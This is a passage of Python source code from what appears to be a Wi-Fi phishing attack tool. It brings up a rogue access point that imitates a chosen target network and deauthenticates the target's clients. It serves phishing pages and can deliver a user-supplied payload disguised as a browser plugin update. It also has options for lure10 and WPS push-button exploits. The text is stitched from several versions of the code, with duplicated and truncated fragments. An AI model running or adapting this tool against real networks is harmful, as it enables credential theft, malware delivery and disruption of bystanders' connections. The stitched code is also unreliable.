        if target_ap_mac is not None:
            ap_logo_path = template.use_file(
                self.mac_matcher.get_vendor_logo_path(target_ap_mac))

        template.merge_context({
            'target_ap_channel':
            channel or "",
            'target_ap_essid':
            essid or "",
            'target_ap_bssid':
            target_ap_mac or "",
            'target_ap_encryption':
            enctype or "",
            'target_ap_vendor':
            self.mac_matcher.get_vendor_name(target_ap_mac) or "",
            'target_ap_logo_path':
            ap_logo_path or ""
        })

        # We want to set this now for hostapd. Maybe the interface was in "monitor"
        # mode for network discovery before (e.g. when --noextensions is enabled).
        self.network_manager.set_interface_mode(ap_iface, "managed")
        # Start AP
        self.network_manager.up_interface(ap_iface)
        self.access_point.set_interface(ap_iface)
        self.access_point.set_channel(channel)
        self.access_point.set_essid(essid)
        if args.wpspbc_assoc_interface:
            wps_mac = self.network_manager.get_interface_mac(
                args.wpspbc_assoc_interface)
            self.access_point.add_deny_macs([wps_mac])
        if args.presharedkey:
            self.access_point.set_psk(args.presharedkey)
        if self.opmode.internet_sharing_enabled():
            self.access_point.set_internet_interface(args.internetinterface)
        print '[' + T + '*' + W + '] Starting the fake access point...'
        try:
            self.access_point.start()
            self.access_point.start_dhcp_dns()
        except BaseException:
            self.stop()
        # Start Extension Manager (EM)
        # We need to start EM before we boot the web server
        if self.opmode.extensions_enabled():
            shared_data = {
                'is_freq_hop_allowed': self.opmode.freq_hopping_enabled(),
                'target_ap_channel': channel or "",
                'target_ap_essid': essid or "",
                'target_ap_bssid': target_ap_mac or "",
                'target_ap_encryption': enctype or "",
                'target_ap_logo_path': ap_logo_path or "",
                'rogue_ap_mac': rogue_ap_mac,
                'APs': APs_context,
                'args': args
            }

            self.network_manager.up_interface(mon_iface)
            self.em.set_interface(mon_iface)
            extensions = DEFAULT_EXTENSIONS
            if args.lure10_exploit:
                extensions.append(LURE10_EXTENSION)
            if args.handshake_capture:
                extensions.append(HANDSHAKE_VALIDATE_EXTENSION)
            if args.nodeauth:
                extensions.remove(DEAUTH_EXTENSION)
            if args.wpspbc_exploit:
                extensions.append(WPSPBC)
            self.em.set_extensions(extensions)
            self.em.init_extensions(shared_data)
            self.em.start_extensions()
        # With configured DHCP, we may now start the web server
        if not self.opmode.internet_sharing_enabled():
            # Start HTTP server in a background thread
            print '[' + T + '*' + W + '] Starting HTTP/HTTPS server at ports ' + str(
                PORT) + ", " + str(SSL_PORT)
            webserver = Thread(target=phishinghttp.runHTTPServer,
                               args=(NETWORK_GW_IP, PORT, SSL_PORT, template,
                                     self.em))
            webserver.daemon = True
            webserver.start()

            time.sleep(1.5)

        # We no longer need mac_matcher
        self.mac_matcher.unbind()

        clients_APs = []
        APs = []

        # Main loop.
        try:
            main_info = tui.MainInfo(VERSION, essid, channel, ap_iface,
                                     self.em, phishinghttp, args)
            tui_main_object = tui.TuiMain()
            curses.wrapper(tui_main_object.gather_info, main_info)
            self.stop()
        except KeyboardInterrupt:
            self.stop()
    def start(self):
        """Run the whole session once: argument parsing through the curses main screen.

        Sequence, as written below: parse and check the command line into
        the module globals ``args``/``APs``; refuse to continue unless
        running as root; select, unblock and MAC-configure the monitor and
        AP interfaces; apply the NAT or localhost-redirect firewall setup;
        pick the target AP (skipped when ``--essid`` is given) and the
        phishing template; bring up the rogue AP with DHCP/DNS, optionally
        the HTTP(S) server thread and the deauthentication worker; then
        block inside ``curses.wrapper`` until the TUI returns or Ctrl-C.

        Side effects: rebinds the globals ``args`` and ``APs``, changes
        interface modes and MAC addresses, alters firewall/routing state,
        and calls ``kill_interfering_procs()`` when no upstream interface is
        given. Every error path ends in ``self.stop()``; the code that
        follows those calls only makes sense if ``stop()`` does not return
        (presumably it exits the process -- not verifiable from this method).

        Returns:
            None.
        """
        # Parse args
        global args, APs
        args = parse_args()

        # Check args
        check_args(args)

        # Are you root?
        # os.geteuid() is non-zero for any unprivileged user; bail out
        # before anything touches interfaces or firewall state.
        if os.geteuid():
            sys.exit('[' + R + '-' + W + '] Please run as root')

        # Only done when no upstream interface is configured (what the
        # helper actually kills is not visible here).
        if not args.internetinterface:
            kill_interfering_procs()

        self.network_manager.start()

        # TODO: We should have more checks here:
        # Is anything binded to our HTTP(S) ports?
        # Maybe we should save current iptables rules somewhere

        # get interfaces for monitor mode and AP mode and set the monitor interface
        # to monitor mode. shutdown on any errors
        try:
            if args.internetinterface:
                if self.network_manager.is_interface_valid(
                        args.internetinterface, "internet"):
                    # internet_interface is only used for this unblock call.
                    internet_interface = args.internetinterface
                    self.network_manager.unblock_interface(internet_interface)
            if not args.nojamming:
                # Explicit interfaces are honoured only when BOTH are given;
                # otherwise both are chosen automatically.
                if args.jamminginterface and args.apinterface:
                    # NOTE(review): if is_interface_valid() reports failure by
                    # returning False rather than raising, mon_iface/ap_iface
                    # stay unbound and the unblock calls below raise
                    # UnboundLocalError, which the except clause does not
                    # catch -- confirm the helper's contract.
                    if self.network_manager.is_interface_valid(
                            args.jamminginterface, "monitor"):
                        mon_iface = args.jamminginterface
                        self.network_manager.unblock_interface(mon_iface)
                    if self.network_manager.is_interface_valid(
                            args.apinterface, "AP"):
                        ap_iface = args.apinterface
                else:
                    mon_iface, ap_iface = self.network_manager.get_interface_automatically(
                    )
                # display selected interfaces to the user
                # Python 2 print statement: the parenthesised string is
                # formatted first, then printed.
                print(
                    "[{0}+{1}] Selecting {0}{2}{1} interface for the deauthentication "
                    "attack\n[{0}+{1}] Selecting {0}{3}{1} interface for creating the "
                    "rogue Access Point").format(G, W, mon_iface, ap_iface)

                # randomize the mac addresses
                # An explicit --mac-* value takes precedence over a random
                # one, decided per interface.
                if not args.no_mac_randomization:
                    if args.mac_ap_interface:
                        self.network_manager.set_interface_mac(
                            ap_iface, args.mac_ap_interface)
                    else:
                        self.network_manager.set_interface_mac_random(ap_iface)
                    if args.mac_deauth_interface:
                        self.network_manager.set_interface_mac(
                            mon_iface, args.mac_deauth_interface)
                    else:
                        self.network_manager.set_interface_mac_random(
                            mon_iface)
            else:
                if args.apinterface:
                    # Same unbound-name caveat as above if validation
                    # returns False instead of raising.
                    if self.network_manager.is_interface_valid(
                            args.apinterface, "AP"):
                        ap_iface = args.apinterface
                else:
                    ap_iface = self.network_manager.get_interface(True, False)
                # With jamming disabled one adapter serves both roles.
                mon_iface = ap_iface

                if not args.no_mac_randomization:
                    if args.mac_ap_interface:
                        self.network_manager.set_interface_mac(
                            ap_iface, args.mac_ap_interface)
                    else:
                        self.network_manager.set_interface_mac_random(ap_iface)

                print(
                    "[{0}+{1}] Selecting {0}{2}{1} interface for creating the "
                    "rogue Access Point").format(G, W, ap_iface)
                # randomize the mac addresses
                # NOTE(review): this runs after the block above has already
                # applied args.mac_ap_interface, so in the --nojamming path an
                # explicitly requested AP MAC is overwritten by a random one.
                if not args.no_mac_randomization:
                    self.network_manager.set_interface_mac_random(ap_iface)

            # make sure interfaces are not blocked
            self.network_manager.unblock_interface(ap_iface)
            self.network_manager.unblock_interface(mon_iface)
            # Unconditional: in the --nojamming case this is the same adapter
            # as ap_iface; it is switched back to "managed" further down
            # before the AP is started.
            self.network_manager.set_interface_mode(mon_iface, "monitor")
        except (interfaces.InvalidInterfaceError,
                interfaces.InterfaceCantBeFoundError,
                interfaces.InterfaceManagedByNetworkManagerError) as err:
            print("[{0}!{1}] {2}").format(R, W, err)

            time.sleep(1)
            # Assumed not to return; if it did, ap_iface/mon_iface could be
            # unbound in the code below.
            self.stop()

        # Report the addresses now in effect (they were changed above; the
        # "Changing" wording is only informational here).
        if not args.no_mac_randomization:
            # NOTE: ap_mac holds the rogue AP's own address at this point; it
            # is rebound below to the *target* AP's BSSID (or None).
            ap_mac = self.network_manager.get_interface_mac(ap_iface)
            print "[{0}+{1}] Changing {2} MAC addr (BSSID) to {3}".format(
                G, W, ap_iface, ap_mac)

            if not args.nojamming:
                mon_mac = self.network_manager.get_interface_mac(mon_iface)
                print("[{0}+{1}] Changing {2} MAC addr (BSSID) to {3}".format(
                    G, W, mon_iface, mon_mac))

        # Upstream interface given: presumably NAT from ap_iface through it
        # and enable forwarding; otherwise client requests are redirected
        # to this host. set_route_localnet() is applied in both cases.
        if args.internetinterface:
            self.fw.nat(ap_iface, args.internetinterface)
            set_ip_fwd()
        else:
            self.fw.redirect_requests_localhost()
        set_route_localnet()

        # NOTE(review): DHCP is not actually started until start_dhcp_dns()
        # further down; this status line is printed early.
        print '[' + T + '*' + W + '] Cleared leases, started DHCP, set up iptables'
        time.sleep(1)

        if args.essid:
            # Fixed-ESSID mode: no target AP is chosen, so BSSID and
            # encryption are unknown (None) and the default CHANNEL is used.
            essid = args.essid
            channel = str(CHANNEL)
            ap_mac = None
            enctype = None
        else:
            # let user choose access point
            ap_info_object = tui.ApSelInfo(mon_iface, self.mac_matcher,
                                           self.network_manager, args)
            ap_sel_object = tui.TuiApSel()
            access_point = curses.wrapper(ap_sel_object.gather_info,
                                          ap_info_object)

            # if the user has chosen a access point continue
            # otherwise shutdown
            if access_point:
                # store choosen access point's information
                essid = access_point.get_name()
                channel = access_point.get_channel()
                ap_mac = access_point.get_mac_address()
                enctype = access_point.get_encryption()
            else:
                # Assumed not to return; otherwise essid/channel/ap_mac/enctype
                # would be unbound below.
                self.stop()
        # create a template manager object
        self.template_manager = phishingpage.TemplateManager()
        # get the correct template
        tui_template_obj = tui.TuiTemplateSelection()
        template = tui_template_obj.gather_info(args.phishingscenario,
                                                self.template_manager)

        print("[" + G + "+" + W + "] Selecting " +
              template.get_display_name() + " template")

        # payload selection for browser plugin update
        if template.has_payload():
            payload_path = False
            # copy payload to update directory
            # Prompt until an existing regular file is named; only existence
            # is checked, nothing about the file's content or type.
            while not payload_path or not os.path.isfile(payload_path):
                # get payload path
                payload_path = raw_input(
                    "[" + G + "+" + W + "] Enter the [" + G + "full path" + W +
                    "] to the payload you wish to serve: ")
                if not os.path.isfile(payload_path):
                    print '[' + R + '-' + W + '] Invalid file path!'
            print '[' + T + '*' + W + '] Using ' + G + payload_path + W + ' as payload '
            # Plain string concatenation: PHISHING_PAGES_DIR must already end
            # with a path separator for this to resolve correctly.
            copyfile(payload_path,
                     PHISHING_PAGES_DIR + template.get_payload_path())

        # Template context for the surrounding APs. APs is indexed by its own
        # iteration variable and each entry's positions 0/1/2 are used as
        # channel/essid/bssid (per the keys below); its exact container type
        # is not visible here. Missing values become "".
        APs_context = []
        for i in APs:
            APs_context.append({
                'channel':
                APs[i][0] or "",
                'essid':
                APs[i][1] or "",
                'bssid':
                APs[i][2] or "",
                'vendor':
                self.mac_matcher.get_vendor_name(APs[i][2]) or ""
            })

        template.merge_context({'APs': APs_context})

        # only get logo path if MAC address is present
        ap_logo_path = False
        if ap_mac:
            ap_logo_path = template.use_file(
                self.mac_matcher.get_vendor_logo_path(ap_mac))

        # Target-AP context; every unknown collapses to "" so the template
        # never sees None/False.
        template.merge_context({
            'target_ap_channel':
            channel or "",
            'target_ap_essid':
            essid or "",
            'target_ap_bssid':
            ap_mac or "",
            'target_ap_encryption':
            enctype or "",
            'target_ap_vendor':
            self.mac_matcher.get_vendor_name(ap_mac) or "",
            'target_ap_logo_path':
            ap_logo_path or ""
        })

        # We want to set this now for hostapd. Maybe the interface was in "monitor"
        # mode for network discovery before (e.g. when --nojamming is enabled).
        self.network_manager.set_interface_mode(ap_iface, "managed")
        # Start AP
        self.access_point.set_interface(ap_iface)
        self.access_point.set_channel(channel)
        self.access_point.set_essid(essid)
        if args.presharedkey:
            self.access_point.set_psk(args.presharedkey)
        if args.internetinterface:
            self.access_point.set_internet_interface(args.internetinterface)
        print '[' + T + '*' + W + '] Starting the fake access point...'
        # Bare except: also swallows KeyboardInterrupt/SystemExit, and the
        # exception is neither printed nor logged before stop() is called.
        try:
            self.access_point.start()
            self.access_point.start_dhcp_dns()
        except:
            self.stop()

        # With configured DHCP, we may now start the web server
        if not args.internetinterface:
            # Start HTTP server in a background thread
            print '[' + T + '*' + W + '] Starting HTTP/HTTPS server at ports ' + str(
                PORT) + ", " + str(SSL_PORT)
            webserver = Thread(target=phishinghttp.runHTTPServer,
                               args=(NETWORK_GW_IP, PORT, SSL_PORT, template))
            # daemon thread: it will not keep the process alive on exit.
            webserver.daemon = True
            webserver.start()

            # presumably gives the server time to bind before the TUI starts
            time.sleep(1.5)

        # We no longer need mac_matcher
        self.mac_matcher.unbind()

        # clients_APs is assigned but never read in this method.
        clients_APs = []
        # Reset the module-level AP table (declared global above).
        APs = []

        deauthentication = None
        if not args.nojamming:
            # set the channel on the deauthenticating interface
            # channel is a str (see the --essid branch); int() raises
            # ValueError if it is not numeric, and nothing here catches that.
            self.network_manager.set_interface_channel(mon_iface, int(channel))
            # start deauthenticating all client on target access point
            # ap_mac is None in --essid mode; how Deauthentication treats that
            # is not visible here -- confirm.
            deauthentication = deauth.Deauthentication(ap_mac, mon_iface)
            if args.lure10_exploit:
                deauthentication.add_lure10_beacons(LOCS_DIR +
                                                    args.lure10_exploit)
            deauthentication.deauthenticate()

        # Main loop.
        # Blocks in curses until the TUI returns. Only Ctrl-C reaches
        # on_exit()/stop() here; a normal TUI return does not call stop(),
        # so cleanup on that path must happen elsewhere -- confirm.
        try:
            main_info = tui.MainInfo(VERSION, essid, channel, ap_iface,
                                     deauthentication, phishinghttp, args)
            tui_main_object = tui.TuiMain()
            curses.wrapper(tui_main_object.gather_info, main_info)
        except KeyboardInterrupt:
            # `is not None` would be the idiomatic identity test.
            if deauthentication != None:
                deauthentication.on_exit()
            self.stop()
                                           self.network_manager, args)
            ap_sel_object = tui.TuiApSel()
            access_point = curses.wrapper(ap_sel_object.gather_info,
                                          ap_info_object)
            # if the user has chosen a access point continue
            # otherwise shutdown
            if access_point:
                # store choosen access point's information
                essid = access_point.name
                channel = access_point.channel
                target_ap_mac = access_point.mac_address
                enctype = access_point.encryption
            else:
                self.stop()
        # create a template manager object
        self.template_manager = phishingpage.TemplateManager(data_pages=args.phishing_pages_directory)
        # get the correct template
        tui_template_obj = tui.TuiTemplateSelection()
        template = tui_template_obj.gather_info(args.phishingscenario,
                                                self.template_manager)
        logger.info("Selecting {} template".format(
            template.get_display_name()))
        print("[" + G + "+" + W + "] Selecting " +
              template.get_display_name() + " template")

        # payload selection for browser plugin update
        if template.has_payload():
            payload_path = args.payload_path
            # copy payload to update directory
            while not payload_path or not os.path.isfile(payload_path):
                # get payload path